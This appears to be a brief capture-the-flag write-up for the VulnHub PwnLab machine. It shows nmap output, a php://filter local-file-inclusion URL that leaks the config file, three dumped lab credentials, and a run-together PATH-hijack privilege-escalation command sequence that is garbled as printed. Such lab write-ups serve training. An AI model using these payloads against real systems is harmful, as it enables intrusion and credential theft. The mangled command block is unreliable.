VulnHub — PwnLab

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: PwnLab Intranet Image Hosting
111/tcp open rpcbind 2–4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 40263/udp status
| 100024 1 43941/tcp status
| 100024 1 57975/tcp6 status
|_ 100024 1 58179/udp6 status
3306/tcp open mysql MySQL 5.5.47–0+deb8u1
| mysql-info:
| Protocol: 10
| Version: 5.5.47–0+deb8u1
| Thread ID: 38
| Capabilities flags: 63487
| Some Capabilities: IgnoreSigpipes, InteractiveClient, Support41Auth, SupportsLoadDataLocal, ConnectWithDatabase, LongPassword, Speaks41ProtocolOld, SupportsTransactions, Speaks41ProtocolNew, LongColumnFlag, IgnoreSpaceBeforeParenthesis, FoundRows, SupportsCompression, DontAllowDatabaseTableColumn, ODBCClient, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
| Status: Autocommit
| Salt: Sp[Y+iQ9h#r7Y:V$K1R+
|_ Auth Plugin Name: mysql_native_password
43941/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:37:E0:05 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2–4.9
Uptime guess: 198.839 days (since Wed Mar 20 13:06:13 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
http://10.0.0.21/?page=php://filter/convert.base64-encode/resource=config
kent - JWzXuBJJNy
mike - SIfdsTEn6I
kane - iSv5Ym2GRo
Commands used { NOTE :- run all this commands at kane directory }echo “/bin/bash” > cat PATH=/home/kane./msgmikePATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games:/usr/share/games:/usr/local/sbin:/usr/sbin:/sbin:/root/.local/bin:/snap/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binid

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store